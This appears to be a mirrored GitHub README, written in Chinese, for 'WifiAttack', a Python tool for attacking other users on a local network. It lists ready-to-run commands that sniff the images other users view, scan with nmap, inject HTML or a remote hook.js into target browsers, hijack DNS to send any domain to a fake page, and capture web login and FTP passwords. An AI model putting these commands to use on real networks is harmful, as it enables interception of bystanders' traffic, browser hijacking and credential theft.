GithubHelp home page GithubHelp logo

wifiattack's Introduction

#A WiFi Attack Tool

监听局域网内的其他用户查看的图片信息:

python WifiAttack.py -u -p -d -ip 192.168.0.10 

如果无法识别MAC地址,则加参数--vmac

python WifiAttack.py -u -p -d -ip 192.168.0.10 -vmac xx:xx:xx:xx:xx

监听整个C段图片信息:

python WifiAttack.py -u -p -d -ip 192.168.0.0/24

利用nmap扫描端口://调用nmap模块进行扫描

python WifiAttack.py -n -ip 192.168.1.110

代码&js注入到目标主机

python WifiAttack.py -c "html代码" -ip 192.168.1.110

python WifiAttack.py -b http://192.168.1.10:3000/hook.js -ip 192.168.1.110

DNS劫持//将目标主机的DNS重定向到某一虚假页面

python WifiAttack.py -a -r 192.168.200.109 -ip 192.168.200.4//重定向任意网站域名到192.168.200.109

抓取web的登录信息,GET/POST;抓取ftp的密码信息

python WifiAttack.py -p -ip 192.168.200.4 

wifiattack's People

Contributors

bing9090 avatar

Watchers

 avatar  avatar

Forkers

wolfmmd

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.